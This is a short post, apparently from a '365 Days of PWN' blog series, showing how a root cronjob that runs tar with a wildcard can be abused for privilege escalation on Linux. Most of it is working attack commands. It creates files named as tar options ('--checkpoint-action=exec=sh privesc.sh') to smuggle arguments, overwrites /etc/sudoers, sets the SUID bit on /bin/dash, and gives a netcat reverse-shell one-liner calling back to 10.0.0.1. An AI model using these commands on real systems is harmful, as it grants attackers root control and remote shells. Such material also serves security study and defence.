Day 67: Tar Cron 2 Root — Abusing Wildcards for Tar Argument Injection in root cronjob (Nix)

The Backstory

cd /var/log/mon && tar -zcf /tmp/mon.tar.gz *
Basic example of wildcards usage# ls *.php
- List all files with PHP extension

# rm *.gz
- Delete all GZIP files

# cat backup*
- Show content of all files which name is beginning with 'backup' string

# ls test?
- List all files whose name is beginning with string 'test' and has exactly one additional character

Exploiting Wildcards

Write to /etc/sudoers

root@box$ echo "user ALL=(root) NOPASSWD: ALL" > /etc/sudoers
user@box:/$ sudo bash
root@box:/# id
uid=0(root) gid=0(root) groups=0(root)

SUID /bin/dash or other similar bins

root@box$ chmod u+s /bin/dash
user@box$ /bin/dash
# id
uid=33(user) euid=0(root) groups=0(root),33(user)

Shell (Reverse/Bind)

root@box$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f" > shell.sh
user@box$ nc -lvnp 1234
# id
uid=0(root) gid=0(root) groups=0(root)

The Glue

root@box:/var/log/mon# crontab -l
*/01 * * * * cd /var/log/mon && tar -zcf /tmp/mon.tar.gz *
--checkpoint[=NUMBER]
display progress messages every NUMBERth record (default 10)

--checkpoint-action=ACTION
execute ACTION on each checkpoint

Putting It All Together

echo 'echo "user ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > privesc.sh
echo "" > "--checkpoint-action=exec=sh privesc.sh"
echo "" > --checkpoint=1
user@box:/$ sudo bash
root@box:/# id
uid=0(root) gid=0(root) groups=0(root)

Security Researcher / 365 Days of PWN

Security Researcher / 365 Days of PWN